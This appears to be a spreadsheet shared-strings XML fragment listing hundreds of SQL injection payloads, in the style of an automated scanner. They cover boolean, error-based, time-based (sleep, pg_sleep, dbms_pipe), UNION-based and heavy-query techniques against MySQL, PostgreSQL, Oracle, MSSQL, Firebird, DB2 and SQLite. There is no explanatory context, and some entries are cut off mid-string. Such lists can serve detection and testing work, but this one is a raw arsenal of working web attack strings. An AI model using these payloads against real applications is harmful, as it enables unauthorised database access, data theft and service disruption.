    <t>1  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  9452 = 9452</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'hxcq' = 'hxcq</t>
  </si>
  <si>
    <t>1' )  where 2808 = 2808</t>
  </si>
  <si>
    <t xml:space="preserve">1 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) </t>
  </si>
  <si>
    <t>1%" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   as qhpv where 7049 = 7049 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>-5424'  )  )   union all select 8231,8231,8231,8231,8231,8231,8231,8231#</t>
  </si>
  <si>
    <t>1%' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%" or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-1714' union all select 6687--</t>
  </si>
  <si>
    <t>-3505" )  where 2340 = 2340 or 9323 = 9323#</t>
  </si>
  <si>
    <t>-4300" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>1  )  )   )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-6642' )  where 3459 = 3459 union all select 3459,3459,3459,3459,3459,3459,3459,3459,3459#</t>
  </si>
  <si>
    <t>-3393"  )  )   union all select 5954,5954,5954,5954,5954,5954,5954,5954,5954,5954--</t>
  </si>
  <si>
    <t>-8486%'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'eqle' = 'eqle</t>
  </si>
  <si>
    <t>1'+ ( select basp where 6953 = 6953</t>
  </si>
  <si>
    <t>1 where 7038 = 7038</t>
  </si>
  <si>
    <t>1%"  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' where 2774 = 2774 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  as jlae where 1650 = 1650</t>
  </si>
  <si>
    <t>-6381%" or 8571 = 8571--</t>
  </si>
  <si>
    <t>1'  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'crkz' = 'crkz</t>
  </si>
  <si>
    <t>1  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-2582'+ ( select ggim where 5346 = 5346 union all select 5346,5346#</t>
  </si>
  <si>
    <t>1 )  as cnpv where 4902 = 4902 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 2928 = 2928 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) </t>
  </si>
  <si>
    <t>1' in boolean mode )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-1711 )  where 9098 = 9098 order by 1#</t>
  </si>
  <si>
    <t>1' where 8537 = 8537 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1 )  as afxc where 7497 = 7497</t>
  </si>
  <si>
    <t>1 )  and 3861 = 5813--</t>
  </si>
  <si>
    <t xml:space="preserve">1' and make_set ( 4952 = 7129,7129 ) </t>
  </si>
  <si>
    <t>1' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'cssb' = 'cssb</t>
  </si>
  <si>
    <t>1' and  ( 1088 = 7530 ) *7530 and 'xkfu' = 'xkfu</t>
  </si>
  <si>
    <t>1' )  where 9091 = 9091 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and 'zjxk' = 'zjxk</t>
  </si>
  <si>
    <t>-1772' or 7911 = 4985#</t>
  </si>
  <si>
    <t>-9171 )  union all select 6880,6880,6880,6880,6880,6880,6880#</t>
  </si>
  <si>
    <t>1 )  where 7748 = 7748 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%' )  rlike sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1" )  where 1144 = 1144 and 2006 = 2006</t>
  </si>
  <si>
    <t>1%'  )  )   and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as wugz where 5355 = 5355 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>-5198  )  )   )  union all select 7089,7089,7089,7089,7089,7089,7089,7089#</t>
  </si>
  <si>
    <t>1' where 6953 = 6953 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1 and 7533 = 7533</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8438 = 7620--</t>
  </si>
  <si>
    <t>1  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  as dfmm where 7563 = 7563 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'zjun' = 'zjun</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1"  )  )   as ycvh where 4523 = 4523 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" order by 1#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "xxug" = "xxug</t>
  </si>
  <si>
    <t>1'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'cfhi' like 'cfhi</t>
  </si>
  <si>
    <t>1" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-4325' or make_set ( 9354 = 9354,7185 ) </t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "yxes" like "yxes</t>
  </si>
  <si>
    <t>1" )  where 2570 = 2570 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   and 4637 = 1408 and   (  (  6509 = 6509</t>
  </si>
  <si>
    <t>1 where 7158 = 7158 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" )  where 5870 = 5870 union all select null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "oyfz" = "oyfz</t>
  </si>
  <si>
    <t>1" )  and 8677 = 9054#</t>
  </si>
  <si>
    <t>-3205" )  union all select 5233,5233,5233,5233#</t>
  </si>
  <si>
    <t>1" )  where 4971 = 4971 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1 where 3956 = 3956</t>
  </si>
  <si>
    <t>1'  )  )   as cyom where 2318 = 2318 and 7533 = 7533--</t>
  </si>
  <si>
    <t>-2725" union all select 3671,3671,3671,3671,3671#</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( "pnsz" like "pnsz</t>
  </si>
  <si>
    <t>-3068%"  )  )   union all select 6597,6597,6597,6597,6597,6597,6597,6597--</t>
  </si>
  <si>
    <t>1' and  ( 3435 = 7210 ) *7210 and 'lxxt' = 'lxxt</t>
  </si>
  <si>
    <t>-8051 )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 5637 = 5637</t>
  </si>
  <si>
    <t>1  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-4580" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'tcfy' where 4546 = 4546 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>-9770'  )  )   as ovhh where 7903 = 7903 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t xml:space="preserve">1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  3078 = 3078</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( 'iwwa' like 'iwwa</t>
  </si>
  <si>
    <t>-8414%" )  union all select 2795#</t>
  </si>
  <si>
    <t>1" )  as fcrx where 2929 = 2929 and 2820 = 5133</t>
  </si>
  <si>
    <t>-4830"  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1 )  where 5073 = 5073 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-3518 )  union all select 1877,1877,1877,1877#</t>
  </si>
  <si>
    <t>1" where 4991 = 4991 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7388" )  as rlth where 5746 = 5746 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1' )  as tqdg where 9355 = 9355</t>
  </si>
  <si>
    <t>1%"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' where 8360 = 8360 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  where 3579 = 3579  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>-2414%" )  or elt ( 1032 = 1032,3623 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-6581'|| ( select 'hpjd' where 7608 = 7608 union all select 7608,7608,7608,7608,7608,7608,7608,7608#</t>
  </si>
  <si>
    <t>-5115" union all select 1642,1642,1642,1642,1642,1642,1642,1642--</t>
  </si>
  <si>
    <t>1'+ ( select 'bztp' where 2541 = 2541 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-6566' )  as kggb where 9768 = 9768 order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  "kvts" like "kvts</t>
  </si>
  <si>
    <t>1'  )  )   as vnwn where 8774 = 8774 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7401 = 9838#</t>
  </si>
  <si>
    <t>1" or elt ( 6272 = 6272,sleep ( 5  )  )   and "zzca" = "zzca</t>
  </si>
  <si>
    <t>1" and make_set ( 8403 = 8403,8899 )  and "bbgg" = "bbgg</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'oskf' like 'oskf</t>
  </si>
  <si>
    <t>1' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'foju' = 'foju</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 'lkun' like 'lkun</t>
  </si>
  <si>
    <t>1"  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  "hhwy" = "hhwy</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 6307 = 2459,1,1/0 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'baur' from dual where 9384 = 9384 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "%" = "</t>
  </si>
  <si>
    <t>-6665'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>-4351' )  or 6525 = 9458</t>
  </si>
  <si>
    <t>-6267"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +cha</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 4924 = 4924</t>
  </si>
  <si>
    <t>1"  )  )   as zemm where 3324 = 3324 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'ankn' = 'ankn</t>
  </si>
  <si>
    <t>1' )  as akvn where 8669 = 8669</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( "stcv" = "stcv</t>
  </si>
  <si>
    <t>-9541 )  as bnky where 3934 = 3934 union all select 3934,3934,3934#</t>
  </si>
  <si>
    <t>1 )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 3294 = 3294</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 where 5925 = 5925 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as yutu where 1306 = 1306 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "eslj" like "eslj</t>
  </si>
  <si>
    <t>1'  )  )   as qpai where 2619 = 2619</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "pmmr" = "pmmr</t>
  </si>
  <si>
    <t>1 )  as fxfe where 1148 = 1148 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1' where 8231 = 8231</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">-9541 where 4291 = 4291 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 </t>
  </si>
  <si>
    <t>1'+ ( select mhfn where 2425 = 2425</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  'vjdk' like 'vjdk</t>
  </si>
  <si>
    <t>1" )  as gffq where 4387 = 4387 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "jydy" like "jydy</t>
  </si>
  <si>
    <t>1' )  as wquy where 2518 = 2518</t>
  </si>
  <si>
    <t>1" )  where 6964 = 6964</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8546' union all select 4729,4729,4729,4729,4729,4729,4729,4729,4729#</t>
  </si>
  <si>
    <t>1"  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "pyfz" like "pyfz</t>
  </si>
  <si>
    <t>-5761" )  or 3762 = 1274</t>
  </si>
  <si>
    <t>1  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "unju" = "unju</t>
  </si>
  <si>
    <t>1'|| ( select 'ovlx' where 8767 = 8767 or sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  as keog where 8033 = 8033 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) </t>
  </si>
  <si>
    <t>1'+ ( select bgbq where 1589 = 1589 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1"  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as tljw where 8474 = 8474 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1' )  where 3311 = 3311</t>
  </si>
  <si>
    <t>1' where 3760 = 3760 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4905" union all select 6082,6082--</t>
  </si>
  <si>
    <t>-9297 )  union all select 6841,6841,6841,6841,6841--</t>
  </si>
  <si>
    <t>-6067'+ ( select 'bfhf' where 3114 = 3114 union all select 3114,3114,3114,3114,3114,3114,3114,3114--</t>
  </si>
  <si>
    <t>-8023' or 6872 = 6872</t>
  </si>
  <si>
    <t>1%' )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'ootz' like 'ootz</t>
  </si>
  <si>
    <t>1"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "rtzn" = "rtzn</t>
  </si>
  <si>
    <t>1"  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( "kfdh" like "kfdh</t>
  </si>
  <si>
    <t>1" )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( "zxks" = "zxks</t>
  </si>
  <si>
    <t>-8118" )  where 3561 = 3561 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>-9110"  )  )   union all select 2263,2263,2263,2263,2263#</t>
  </si>
  <si>
    <t>-9582' )  where 4397 = 4397 union all select 4397,4397,4397#</t>
  </si>
  <si>
    <t>1"  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>-4896' )  union all select 1929--</t>
  </si>
  <si>
    <t>1'  )  )   as fcjk where 7755 = 7755</t>
  </si>
  <si>
    <t>1'+ ( select 'asdq' where 4023 = 4023 and make_set ( 8403 = 8403,8899  )  )  +'</t>
  </si>
  <si>
    <t>1' )  where 6274 = 6274 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) -- ivku</t>
  </si>
  <si>
    <t xml:space="preserve">elt ( 2427 = 2427,5518 ) </t>
  </si>
  <si>
    <t>-2860"  )  )   order by 1#</t>
  </si>
  <si>
    <t>1' )  as yjdg where 5262 = 5262 union all select null,null,null#</t>
  </si>
  <si>
    <t>select * from generate_series ( 9058,9058,case when  ( 9058 = 1183 )  then 1 else 0 end )  limit 1--</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</si>
  <si>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</si>
  <si>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1'  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  'ltym' = 'ltym</t>
  </si>
  <si>
    <t>-5008' union all select 1942,1942,1942,1942,1942,1942,1942,1942--</t>
  </si>
  <si>
    <t>1" )  where 7452 = 7452</t>
  </si>
  <si>
    <t>1  )  )   as fqee where 3286 = 3286</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 )  as zelk where 1944 = 1944 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2948'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  'ivwt' = 'ivwt</t>
  </si>
  <si>
    <t>-2006'  )  )   union all select 7852,7852,7852,7852,7852--</t>
  </si>
  <si>
    <t>1  )  )   as zykv where 2158 = 2158</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'kyhs' from dual where 9491 = 9491</t>
  </si>
  <si>
